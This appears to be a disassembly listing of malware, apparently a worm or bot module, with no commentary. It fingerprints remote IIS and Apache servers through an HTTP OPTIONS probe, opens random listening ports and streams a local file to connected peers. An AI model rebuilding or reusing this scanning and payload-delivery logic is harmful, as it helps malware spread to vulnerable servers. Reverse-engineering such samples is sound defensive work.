jmp short loc_4128A0
; ---------------------------------------------------------------------------
loc_41289B: ; CODE XREF: sub_4127D0+BD�j
jmp loc_4127F9
; ---------------------------------------------------------------------------
loc_4128A0: ; CODE XREF: sub_4127D0+10�j
; sub_4127D0+46�j ...
cmp dword_41EAF0, 0
jz short loc_4128AE
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128AE: ; CODE XREF: sub_4127D0+D7�j
push offset aRb ; "rb"
push offset dword_41EC10
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4128CC
xor eax, eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_4128CC: ; CODE XREF: sub_4127D0+F6�j
and [ebp+var_4], 0
loc_4128D0: ; CODE XREF: sub_4127D0+145�j
push [ebp+var_8]
push 200h
push 1
lea eax, [ebp+var_208]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412900
push [ebp+var_8]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_412917
; ---------------------------------------------------------------------------
loc_412900: ; CODE XREF: sub_4127D0+120�j
push [ebp+var_4]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
jmp short loc_4128D0
; ---------------------------------------------------------------------------
locret_412917: ; CODE XREF: sub_4127D0+DC�j
; sub_4127D0+FA�j ...
leave
retn
sub_4127D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412919 proc near ; CODE XREF: sub_412BC9+E8�p
; sub_412D56+18�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412938
xor eax, eax
jmp short locret_41294C
; ---------------------------------------------------------------------------
loc_412938: ; CODE XREF: sub_412919+19�j
push 0
push 4
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call dword_417248 ; recv
mov eax, [ebp+var_4]
locret_41294C: ; CODE XREF: sub_412919+1D�j
leave
retn
sub_412919 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41294E proc near ; CODE XREF: sub_412BC9+115�p
; sub_412D56+3B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_412964
; ---------------------------------------------------------------------------
loc_41295D: ; CODE XREF: sub_41294E:loc_4129C3�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_412964: ; CODE XREF: sub_41294E+D�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCD6[eax], 0
jz short loc_4129C5
mov eax, [ebp+var_8]
imul eax, 3Ah
mov eax, dword_41CCCE[eax]
cmp eax, [ebp+arg_0]
jnz short loc_4129C3
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CCA8
mov [ebp+var_4], eax
push 3Ah
mov eax, [ebp+var_8]
imul eax, 3Ah
add eax, offset byte_41CCA8
push eax
push [ebp+arg_4]
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
call sub_4105FB
pop ecx
mov eax, [ebp+arg_4]
add eax, 13h
push eax
call sub_4105FB
pop ecx
jmp short loc_4129C5
; ---------------------------------------------------------------------------
loc_4129C3: ; CODE XREF: sub_41294E+34�j
jmp short loc_41295D
; ---------------------------------------------------------------------------
loc_4129C5: ; CODE XREF: sub_41294E+23�j
; sub_41294E+73�j
mov eax, [ebp+var_4]
leave
retn
sub_41294E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4129CA proc near ; CODE XREF: sub_412A3A+16B�p
; sub_412BC9+15A�p ...
var_104 = dword ptr -104h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 104h
push 1
mov eax, [ebp+arg_0]
add eax, 2Ah
push eax
call sub_409C88
pop ecx
pop ecx
mov [ebp+var_104], eax
lea eax, [ebp+var_100]
push eax
push [ebp+arg_8]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_412A11
push offset aUnknown ; "unknown"
lea eax, [ebp+var_100]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412A11: ; CODE XREF: sub_4129CA+32�j
lea eax, [ebp+var_100]
push eax
mov eax, [ebp+var_104]
inc eax
push eax
push [ebp+arg_C]
push [ebp+arg_4]
push offset dword_41A1D0
push offset dword_41DA80
call sub_40D4AB
add esp, 18h
leave
retn
sub_4129CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A3A proc near ; CODE XREF: sub_41331E+148�p
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = byte ptr -248h
var_235 = byte ptr -235h
var_222 = dword ptr -222h
var_20C = dword ptr -20Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 250h
push [ebp+arg_4]
call sub_412720
pop ecx
push 3Ah
push [ebp+arg_0]
lea eax, [ebp+var_248]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_248]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_235]
push eax
call sub_4105FB
pop ecx
lea eax, [ebp+var_20C+3]
mov [ebp+var_8], eax
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
and [ebp+var_4], 0
jmp short loc_412AA6
; ---------------------------------------------------------------------------
loc_412A9F: ; CODE XREF: sub_412A3A+8A�j
; sub_412A3A:loc_412B7F�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412AA6: ; CODE XREF: sub_412A3A+63�j
cmp [ebp+var_4], 3Ch
jnz short loc_412AB1
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AB1: ; CODE XREF: sub_412A3A+70�j
push 3E8h
push [ebp+arg_4]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_412AC6
jmp short loc_412A9F
; ---------------------------------------------------------------------------
loc_412AC6: ; CODE XREF: sub_412A3A+88�j
push 200h
push [ebp+var_8]
push [ebp+arg_4]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_24C], eax
cmp [ebp+var_24C], 0FFFFFFFFh
jnz short loc_412AED
jmp locret_412BC7
; ---------------------------------------------------------------------------
loc_412AED: ; CODE XREF: sub_412A3A+AC�j
cmp [ebp+var_24C], 0
jz short loc_412B69
and [ebp+var_250], 0
jmp short loc_412B0C
; ---------------------------------------------------------------------------
loc_412AFF: ; CODE XREF: sub_412A3A:loc_412B34�j
mov eax, [ebp+var_250]
inc eax
mov [ebp+var_250], eax
loc_412B0C: ; CODE XREF: sub_412A3A+C3�j
mov eax, [ebp+var_250]
cmp eax, [ebp+var_24C]
jnb short loc_412B36
mov eax, [ebp+var_250]
mov eax, [ebp+eax+var_20C]
cmp eax, [ebp+var_222]
jnz short loc_412B34
jmp loc_412BC5
; ---------------------------------------------------------------------------
loc_412B34: ; CODE XREF: sub_412A3A+F3�j
jmp short loc_412AFF
; ---------------------------------------------------------------------------
loc_412B36: ; CODE XREF: sub_412A3A+DE�j
push 3
mov eax, [ebp+var_24C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3]
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 200h
push 0
push [ebp+var_8]
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_412B7F
; ---------------------------------------------------------------------------
loc_412B69: ; CODE XREF: sub_412A3A+BA�j
push 203h
push 0
lea eax, [ebp+var_20C]
push eax
call sub_416B6A ; memset
add esp, 0Ch
loc_412B7F: ; CODE XREF: sub_412A3A+12D�j
jmp loc_412A9F
; ---------------------------------------------------------------------------
loc_412B84: ; CODE XREF: sub_412A3A:loc_412BC5�j
push [ebp+arg_4]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412B93
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412B93: ; CODE XREF: sub_412A3A+155�j
push offset dword_41CC40
push [ebp+arg_4]
lea eax, [ebp+var_248]
push eax
push [ebp+arg_0]
call sub_4129CA
add esp, 10h
push 1
push [ebp+arg_4]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
jmp short locret_412BC7
; ---------------------------------------------------------------------------
loc_412BC5: ; CODE XREF: sub_412A3A+F5�j
jmp short loc_412B84
; ---------------------------------------------------------------------------
locret_412BC7: ; CODE XREF: sub_412A3A+72�j
; sub_412A3A+AE�j ...
leave
retn
sub_412A3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412BC9 proc near ; CODE XREF: sub_41331E+165�p
var_85C = dword ptr -85Ch
var_858 = dword ptr -858h
var_854 = dword ptr -854h
var_850 = dword ptr -850h
var_84C = byte ptr -84Ch
var_810 = dword ptr -810h
var_80C = dword ptr -80Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 85Ch
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_404FE7
add esp, 0Ch
mov [ebp+var_8], eax
mov [ebp+var_854], 3Ch
and [ebp+var_850], 0
and [ebp+var_810], 0
loc_412BFD: ; CODE XREF: sub_412BC9+A9�j
and [ebp+var_85C], 0
jmp short loc_412C13
; ---------------------------------------------------------------------------
loc_412C06: ; CODE XREF: sub_412BC9:loc_412C35�j
mov eax, [ebp+var_85C]
inc eax
mov [ebp+var_85C], eax
loc_412C13: ; CODE XREF: sub_412BC9+3B�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnb short loc_412C37
mov eax, [ebp+var_85C]
mov eax, [ebp+eax*4+var_80C]
cmp eax, [ebp+var_8]
jnz short loc_412C35
jmp short loc_412C37
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412BC9+68�j
jmp short loc_412C06
; ---------------------------------------------------------------------------
loc_412C37: ; CODE XREF: sub_412BC9+56�j
; sub_412BC9+6A�j
mov eax, [ebp+var_85C]
cmp eax, [ebp+var_810]
jnz short loc_412C6E
cmp [ebp+var_810], 200h
jnb short loc_412C6E
mov eax, [ebp+var_85C]
mov ecx, [ebp+var_8]
mov [ebp+eax*4+var_80C], ecx
mov eax, [ebp+var_810]
inc eax
mov [ebp+var_810], eax
loc_412C6E: ; CODE XREF: sub_412BC9+7A�j
; sub_412BC9+86�j
xor eax, eax
test eax, eax
jnz short loc_412BFD
lea eax, [ebp+var_854]
push eax
push 0
lea eax, [ebp+var_810]
push eax
push 0
push 0
call dword_41722C ; select
mov [ebp+var_C], eax
cmp [ebp+var_C], 1
jz short loc_412CA5
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp locret_412D4A
; ---------------------------------------------------------------------------
loc_412CA5: ; CODE XREF: sub_412BC9+CC�j
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_858], eax
cmp [ebp+var_858], 0
jnz short loc_412CD1
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CD1: ; CODE XREF: sub_412BC9+FB�j
lea eax, [ebp+var_84C]
push eax
push [ebp+var_858]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412CF9
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412CF9: ; CODE XREF: sub_412BC9+123�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412D11
push [ebp+var_8]
call sub_4053B1
pop ecx
jmp short locret_412D4A
; ---------------------------------------------------------------------------
loc_412D11: ; CODE XREF: sub_412BC9+13B�j
push offset dword_41CC44
push [ebp+var_8]
lea eax, [ebp+var_84C]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
locret_412D4A: ; CODE XREF: sub_412BC9+D7�j
; sub_412BC9+106�j ...
leave
retn
sub_412BC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D4C proc near ; CODE XREF: sub_41331E:loc_413420�p
push ebp
mov ebp, esp
mov eax, offset dword_41EAF4
pop ebp
retn
sub_412D4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412D56 proc near ; DATA XREF: sub_412E04+CA�o
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 48h
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
push [ebp+var_8]
call sub_412720
pop ecx
push [ebp+var_8]
call sub_412919
pop ecx
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jnz short loc_412D8A
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412D8A: ; CODE XREF: sub_412D56+25�j
lea eax, [ebp+var_44]
push eax
push [ebp+var_48]
call sub_41294E
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412DAE
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DAE: ; CODE XREF: sub_412D56+49�j
push [ebp+var_8]
call sub_4127D0
pop ecx
test eax, eax
jnz short loc_412DC8
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
jmp short locret_412E00
; ---------------------------------------------------------------------------
loc_412DC8: ; CODE XREF: sub_412D56+63�j
push offset dword_41CC48
push [ebp+var_8]
lea eax, [ebp+var_44]
push eax
push [ebp+var_4]
call sub_4129CA
add esp, 10h
push 1
push [ebp+var_8]
call dword_417200 ; shutdown
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_8]
call sub_4053B1
pop ecx
xor eax, eax
locret_412E00: ; CODE XREF: sub_412D56+32�j
; sub_412D56+56�j ...
leave
retn 4
sub_412D56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E04 proc near ; DATA XREF: sub_412F07+B0�o
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = byte ptr -1B0h
var_1AA = byte ptr -1AAh
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1B8h
push 1ADh
push [ebp+arg_0]
lea eax, [ebp+var_1B4]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
lea eax, [ebp+var_1B0]
push eax
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_412E59
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
jmp locret_412F03
; ---------------------------------------------------------------------------
loc_412E59: ; CODE XREF: sub_412E04+40�j
lea eax, [ebp+var_1B0]
push eax
mov eax, [ebp+var_1B4]
push dword ptr [eax]
push offset dword_41CC4C
lea eax, [ebp+var_1AA]
push eax
call sub_40D53F
add esp, 10h
lea eax, [ebp+var_1B0]
push eax
push offset dword_41EAF4
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_412E8F: ; CODE XREF: sub_412E04+B7�j
; sub_412E04:loc_412EEA�j
mov eax, [ebp+var_1B4]
cmp dword ptr [eax+4], 0
jz short loc_412E9D
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412E9D: ; CODE XREF: sub_412E04+95�j
push 3E8h
push [ebp+var_4]
call sub_4048EF
pop ecx
pop ecx
mov [ebp+var_1B8], eax
cmp [ebp+var_1B8], 0FFFFFFFFh
jnz short loc_412EBD
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EBD: ; CODE XREF: sub_412E04+B5�j
cmp [ebp+var_1B8], 0
jnz short loc_412EC8
jmp short loc_412EEC
; ---------------------------------------------------------------------------
loc_412EC8: ; CODE XREF: sub_412E04+C0�j
push [ebp+var_1B8]
push offset sub_412D56
call sub_409479
pop ecx
pop ecx
test eax, eax
jnz short loc_412EEA
push [ebp+var_1B8]
call sub_4053B1
pop ecx
loc_412EEA: ; CODE XREF: sub_412E04+D8�j
jmp short loc_412E8F
; ---------------------------------------------------------------------------
loc_412EEC: ; CODE XREF: sub_412E04+97�j
; sub_412E04+C2�j
push [ebp+var_4]
call sub_404CBB
pop ecx
push [ebp+var_1B4]
call sub_409763
pop ecx
xor eax, eax
locret_412F03: ; CODE XREF: sub_412E04+50�j
leave
retn 4
sub_412E04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412F07 proc near ; CODE XREF: sub_40A9CF+F6E�p
; sub_41349C+2C7�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push 1ADh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_412F26
jmp locret_412FC4
; ---------------------------------------------------------------------------
loc_412F26: ; CODE XREF: sub_412F07+18�j
cmp [ebp+arg_4], 0
jz short loc_412F3A
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_C], eax
jmp short loc_412F4E
; ---------------------------------------------------------------------------
loc_412F3A: ; CODE XREF: sub_412F07+23�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_C], eax
loc_412F4E: ; CODE XREF: sub_412F07+31�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_412F63
cmp [ebp+var_4], 0FFFFh
jbe short loc_412F77
loc_412F63: ; CODE XREF: sub_412F07+51�j
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_4], eax
loc_412F77: ; CODE XREF: sub_412F07+5A�j
push 0Ah
mov eax, [ebp+var_8]
add eax, 4
push eax
push [ebp+var_4]
call sub_416F7A ; _itoa
add esp, 0Ch
push [ebp+arg_0]
mov eax, [ebp+var_8]
add eax, 0Ah
push eax
call sub_405F67
pop ecx
pop ecx
push [ebp+var_4]
push offset dword_41CC84
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_8]
push offset sub_412E04
call sub_4095A4
add esp, 14h
locret_412FC4: ; CODE XREF: sub_412F07+1A�j
leave
retn
sub_412F07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412FC6 proc near ; CODE XREF: sub_4167F1+DA�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
jmp short loc_412FD8
; ---------------------------------------------------------------------------
loc_412FD1: ; CODE XREF: sub_412FC6:loc_413088�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_412FD8: ; CODE XREF: sub_412FC6+9�j
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp off_41CCD6[eax], 0
jz locret_41308D
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov ecx, dword_41CCCE[ecx]
and ecx, 0FFh
mov eax, off_41CCD6[eax]
sub eax, ecx
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov off_41CCD6[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
and dword_41CCD2[eax], 0
loc_413024: ; CODE XREF: sub_412FC6+7E�j
; sub_412FC6+BE�j
call sub_410422
mov ecx, [ebp+var_4]
imul ecx, 3Ah
mov dword_41CCCE[ecx], eax
mov eax, [ebp+var_4]
imul eax, 3Ah
cmp dword_41CCCE[eax], 0
jnz short loc_413046
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413046: ; CODE XREF: sub_412FC6+7C�j
and [ebp+var_8], 0
jmp short loc_413053
; ---------------------------------------------------------------------------
loc_41304C: ; CODE XREF: sub_412FC6:loc_413086�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_413053: ; CODE XREF: sub_412FC6+84�j
mov eax, [ebp+var_8]
imul eax, 3Ah
cmp off_41CCD6[eax], 0
jz short loc_413088
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jz short loc_413086
mov eax, [ebp+var_4]
imul eax, 3Ah
mov ecx, [ebp+var_8]
imul ecx, 3Ah
mov eax, dword_41CCCE[eax]
cmp eax, dword_41CCCE[ecx]
jnz short loc_413086
jmp short loc_413024
; ---------------------------------------------------------------------------
loc_413086: ; CODE XREF: sub_412FC6+A2�j
; sub_412FC6+BC�j
jmp short loc_41304C
; ---------------------------------------------------------------------------
loc_413088: ; CODE XREF: sub_412FC6+9A�j
jmp loc_412FD1
; ---------------------------------------------------------------------------
locret_41308D: ; CODE XREF: sub_412FC6+1F�j
leave
retn
sub_412FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41308F proc near ; CODE XREF: sub_41331E+72�p
var_820 = dword ptr -820h
var_81C = dword ptr -81Ch
var_818 = dword ptr -818h
var_814 = dword ptr -814h
var_810 = byte ptr -810h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 820h
push 16h
push offset aOptionsHttp1_0 ; "OPTIONS / HTTP/1.0\r\n\r\n"
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 0EA60h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_4130C4
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130C4: ; CODE XREF: sub_41308F+2C�j
push 0
push 800h
lea eax, [ebp+var_810]
push eax
push [ebp+arg_0]
call dword_417248 ; recv
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4130F3
cmp [ebp+var_8], 0FFFFFFFFh
jz short loc_4130F3
cmp [ebp+var_8], 800h
jnz short loc_4130FA
loc_4130F3: ; CODE XREF: sub_41308F+53�j
; sub_41308F+59�j
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4130FA: ; CODE XREF: sub_41308F+62�j
mov eax, [ebp+var_8]
and [ebp+eax+var_810], 0
and [ebp+var_4], 0
push offset aServer ; "Server:"
lea eax, [ebp+var_810]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_41312C
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41312C: ; CODE XREF: sub_41308F+94�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push [ebp+var_10]
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413150
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413150: ; CODE XREF: sub_41308F+B8�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_413173
xor eax, eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413173: ; CODE XREF: sub_41308F+DB�j
lea eax, [ebp+var_4]
push eax
push offset dword_418F4C
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
push 0Dh
push offset aMicrosoftIis ; "Microsoft-IIS"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41323C
and [ebp+var_818], 0
and [ebp+var_814], 0
lea eax, [ebp+var_814]
push eax
lea eax, [ebp+var_818]
push eax
push offset aMicrosoftIisU_ ; "Microsoft-IIS/%u.%u"
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 10h
cmp [ebp+var_818], 4
jnz short loc_4131E9
cmp [ebp+var_814], 0
jnz short loc_4131E9
push 4
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_4131E9: ; CODE XREF: sub_41308F+147�j
; sub_41308F+150�j
cmp [ebp+var_818], 5
jnz short loc_413203
cmp [ebp+var_814], 0
jnz short loc_413203
push 3
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413203: ; CODE XREF: sub_41308F+161�j
; sub_41308F+16A�j
cmp [ebp+var_818], 5
jnz short loc_41321D
cmp [ebp+var_814], 5
jnz short loc_41321D
push 2
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_41321D: ; CODE XREF: sub_41308F+17B�j
; sub_41308F+184�j
cmp [ebp+var_818], 6
jnz short loc_413237
cmp [ebp+var_814], 0
jnz short loc_413237
push 1
pop eax
jmp locret_41331C
; ---------------------------------------------------------------------------
loc_413237: ; CODE XREF: sub_41308F+195�j
; sub_41308F+19E�j
jmp loc_41331A
; ---------------------------------------------------------------------------
loc_41323C: ; CODE XREF: sub_41308F+10E�j
cmp [ebp+var_C], 0
jz loc_41331A
push 6
push offset aApache ; "Apache"
push [ebp+var_10]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz loc_41331A
and [ebp+var_820], 0
lea eax, [ebp+var_820]
push eax
push offset dword_41CD68
push [ebp+var_10]
call sub_416BA2 ; sscanf
add esp, 0Ch
push 6
push offset dword_41CD60
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
neg eax
sbb eax, eax
inc eax
mov [ebp+var_81C], eax
cmp [ebp+var_81C], 1
jnz short loc_4132BE
push 7
push offset dword_41CD58
push [ebp+var_C]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jz short loc_4132BE
xor eax, eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132BE: ; CODE XREF: sub_41308F+213�j
; sub_41308F+229�j
cmp [ebp+var_820], 1
jnz short loc_4132D5
cmp [ebp+var_81C], 0
jz short loc_4132D5
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132D5: ; CODE XREF: sub_41308F+236�j
; sub_41308F+23F�j
cmp [ebp+var_820], 1
jnz short loc_4132EC
cmp [ebp+var_81C], 0
jnz short loc_4132EC
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_4132EC: ; CODE XREF: sub_41308F+24D�j
; sub_41308F+256�j
cmp [ebp+var_820], 2
jnz short loc_413303
cmp [ebp+var_81C], 0
jz short loc_413303
push 6
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_413303: ; CODE XREF: sub_41308F+264�j
; sub_41308F+26D�j
cmp [ebp+var_820], 2
jnz short loc_41331A
cmp [ebp+var_81C], 0
jnz short loc_41331A
push 5
pop eax
jmp short locret_41331C
; ---------------------------------------------------------------------------
loc_41331A: ; CODE XREF: sub_41308F:loc_413237�j
; sub_41308F+1B1�j ...
xor eax, eax
locret_41331C: ; CODE XREF: sub_41308F+30�j
; sub_41308F+66�j ...
leave
retn
sub_41308F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41331E proc near ; DATA XREF: sub_41349C+4EB�o
; sub_413CB3+27C�o
var_14C = dword ptr -14Ch
var_11A = dword ptr -11Ah
var_112 = dword ptr -112h
var_10E = dword ptr -10Eh
var_10A = byte ptr -10Ah
var_8A = dword ptr -8Ah
var_86 = byte ptr -86h
var_6 = byte ptr -6
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14Ch
push 14Ch
push [ebp+arg_0]
lea eax, [ebp+var_14C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 1
push [ebp+var_10E]
call sub_404457
pop ecx
pop ecx
lea eax, [ebp+var_10A]
push eax
push [ebp+var_10E]
call sub_4044F7
pop ecx
pop ecx
test eax, eax
jnz short loc_413381
push [ebp+var_10E]
call sub_40538D
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_413381: ; CODE XREF: sub_41331E+4E�j
cmp [ebp+var_112], 0
jz short loc_4133B1
push [ebp+var_10E]
call sub_41308F
pop ecx
cmp [ebp+var_112], eax
jz short loc_4133B1
push [ebp+var_10E]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_413498
; ---------------------------------------------------------------------------
loc_4133B1: ; CODE XREF: sub_41331E+6A�j
; sub_41331E+7E�j
cmp [ebp+var_8A], 1
jnz short loc_4133E0
lea eax, [ebp+var_6]
push eax
push [ebp+var_10E]
call sub_404552
pop ecx
pop ecx
push offset dword_41EF18
lea eax, [ebp+var_86]
push eax
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_413444
; ---------------------------------------------------------------------------
loc_4133E0: ; CODE XREF: sub_41331E+9A�j
cmp [ebp+var_8A], 2
jnz short loc_413420
push 0Ah
lea eax, [ebp+var_6]
push eax
push 0FFFFh
push 401h
call sub_4103F5
pop ecx
pop ecx
push eax
call sub_416F7A ; _itoa
add esp, 0Ch
